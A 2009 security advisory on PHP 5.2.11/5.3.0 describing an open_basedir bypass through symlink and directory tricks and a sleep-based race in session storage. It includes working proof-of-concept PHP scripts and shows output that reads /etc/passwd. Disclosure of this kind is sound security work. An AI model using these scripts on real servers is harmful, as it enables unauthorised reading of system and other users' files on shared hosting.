PHP 5.2.12/5.3.1 Multiple Vulnerabilities

Advisory Content :

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[ PHP 5.2.11/5.3.0 Multiple Vulnerabilities ]

Author: Maksymilian Arciemowicz
http://SecurityReason.com
Date:
- - Dis.: 01.10.2009
- - Pub.: 13.11.2009

Risk: Medium

Affected Software:
- - PHP 5.3.0
- - PHP 5.2.11

Original URL:
http://securityreason.com/achievement_securityalert/70

- --- 0.Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is borrowed
from C, Java and Perl with a couple of unique PHP-specific features thrown
in. The goal of the language is to allow web developers to write
dynamically generated pages quickly.

http://lu2.php.net/manual/en/function.symlink.php

ksymlink ? Creates a symbolic link

bool symlink ( string $target , string $link )

- --- 1. PHP 5.2.11/5.3.0 Multiple Vulnerabilities ---
The first main problem exist in security model based on symlinks
open_basedir. Paths like $target and $link are checked by open_basedir. We
can bypass open_basedir, but function symlink() is not affected. Issue has
been generated by false security model designed by PHP.

example:
127# cat sym.php
<?php
symlink("/etc/passwd", "./symlink");
?>
127# php sym.php
PHP Warning: symlink(): open_basedir restriction in effect.
File(/etc/passwd) is not within the allowed path(s): (/www) in
/www/test/sym.php on line 2

Warning: symlink(): open_basedir restriction in effect. File(/etc/passwd)
is not within the allowed path(s): (/www) in /www/test/sym.php on line 2
127#

open_basedir will disallow /etc/passwd.

Let`s see:
127# ls -la
total 8
drwxr-xr-x 2 www www 512 Oct 20 00:33 .
drwxr-xr-x 13 www www 1536 Oct 20 00:26 ..
- -rw-r--r-- 1 www www 356 Oct 20 00:32 kakao.php
- -rw-r--r-- 1 www www 45 Oct 20 00:26 sym.php
127# pwd
/www/test
127# cat kakao.php
<?php
mkdir("abc");
chdir("abc");
mkdir("etc");
chdir("etc");
mkdir("passwd");
chdir("..");
mkdir("abc");
chdir("abc");
mkdir("abc");
chdir("abc");
mkdir("abc");
chdir("abc");
chdir("..");
chdir("..");
chdir("..");
chdir("..");
symlink("abc/abc/abc/abc","tmplink");
symlink("tmplink/../../../etc/passwd", "exploit");
unlink("tmplink");
mkdir("tmplink");
?>

127# php kakao.php
127# ls -la
total 12
drwxr-xr-x 4 www www 512 Oct 20 00:37 .
drwxr-xr-x 13 www www 1536 Oct 20 00:26 ..
drwxr-xr-x 4 www www 512 Oct 20 00:37 abc
lrwxr-xr-x 1 www www 27 Oct 20 00:37 exploit ->
tmplink/../../../etc/passwd
- -rw-r--r-- 1 www www 356 Oct 20 00:32 kakao.php
- -rw-r--r-- 1 www www 45 Oct 20 00:26 sym.php
drwxr-xr-x 2 www www 512 Oct 20 00:37 tmplink
127# cat exploit
# passwd
#
root:*:0:0:god:/root:/bin/csh
...

now "tmplink" is a directory. so link "exploit" will be "../../etc/passwd".
We don't need bypass open_basedir, it is a design mistake. PHP will allow
"tmplink/../../../etc/passwd" because ./tmplink/../../../etc/passwd realy
exists.
So if we want read other file, we need create other structure.

example "/usr/pkg/etc/php.ini":

mkdir("usr");
chdir("usr");
mkdir("pkg");
chdir("pkg");
mkdir("etc");
chdir("etc");
mkdir("php.ini");
chdir("..");
chdir("..");
chdir("..");

PHP will confirm, that tmplink/../../../usr/pkg/etc/php.ini realy exist.
Very important is removing fake link "tmplink" and we need to create in
this same place dir with this same name.

unlink("tmplink");
mkdir("tmplink");

This is the main trick here. Because, "tmplink" (dir) are only -1 deep, not
-4.

Under PHP 5.2.11 we can also bypass safe_mode. However, the security, such
as whether to run suphp php with the privileges of users also have their
drawbacks.

We can use our exploit to show this vulnerability. If httpd allow read link
(default), we can create symlink to / (ofcourse if we have access). If we
can not read symlink, we can use next PHP flaw "hazard syphon" to read
other files.

example of php hazard (session) (open_basedir=/www):

script0 "/www/test/.htaccess":
php_value session.save_path "/www/test/notyetexists"

file /www/test/notyetexists doesn`t exist (current)

script1 "/www/test/sessrun.php"
<?php
sleep(60);
session_start();
?>

now we have 60 sec to run script2

script2 "/www/test/runin60.php":

<?php
mkdir("abc");
chdir("abc");
mkdir("tmp");
mkdir("abc");
chdir("abc");
mkdir("abc");
chdir("abc");
mkdir("abc");
chdir("abc");
chdir("..");
chdir("..");
chdir("..");
chdir("..");
symlink("abc/abc/abc/abc","tmplink");
symlink("tmplink/../../../tmp", "notyetexists");
unlink("tmplink");
mkdir("tmplink");
?>

Hazard exist in PHP!

Plan of action:
0. Create .htaccess with 'session.save_path "/www/test/notyetexists"'.
1. Run script1, where first phase (SAPI) will check privileges to
/www/test/notyetexists. But this file or dir, doesn't exists, so
open_basedir will return false.
2. Script1 will generate sleep signal with 60sec delay. In this momemnt, we
need run Scritp2. This script, will create link /www/test/notyetexists to
/tmp or other directories.
3. Script1 after 60sec will run session_start() function, where privileges
to /www/test/notyetexists aren't checked in this moment.

In result, we can use function sleep() to create fake delay and first issue
can help create symlinks.

- --- 2. Exploit ---

open_basedir bypass:
http://securityreason.com/achievement_exploitalert/14

hazard analogy, as in this note

- --- 3. Fix ---
Fix not avaliable

- --- 4. Greets ---
sp3x Infospec Chujwamwdupe p_e_a pi3

- --- 4. Contact ---
Author: SecurityReason.com [ Maksymilian Arciemowicz ]
Email: cxib {a.t] securityreason [d00t} com
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
http://securityreason.com
http://securityreason.pl

-----BEGIN PGP SIGNATURE-----

iEYEARECAAYFAkr9T/QACgkQpiCeOKaYa9bYpwCcDMhz1ZZ77eTAYP8J1XNw4oCJ
/FkAnjzOsL7cfglROPztMhNV20ddHd9E
=R33T
-----END PGP SIGNATURE-----

Security

IT News

Search

SecurityAlert Database

About SecurityAlert

ExploitAlert Database

SecurityReason Research

WLB Database

Send to WLB

About WLB

Security Audit

Schedule

Prices of services

Contact

SecurityReason IT News

SecurityAlert

World Laboratory of Bugtraq

ExploitAlert

Apache

PHP

Contact

About SecurityReason

PHP 5.2.12/5.3.1 Multiple Vulnerabilities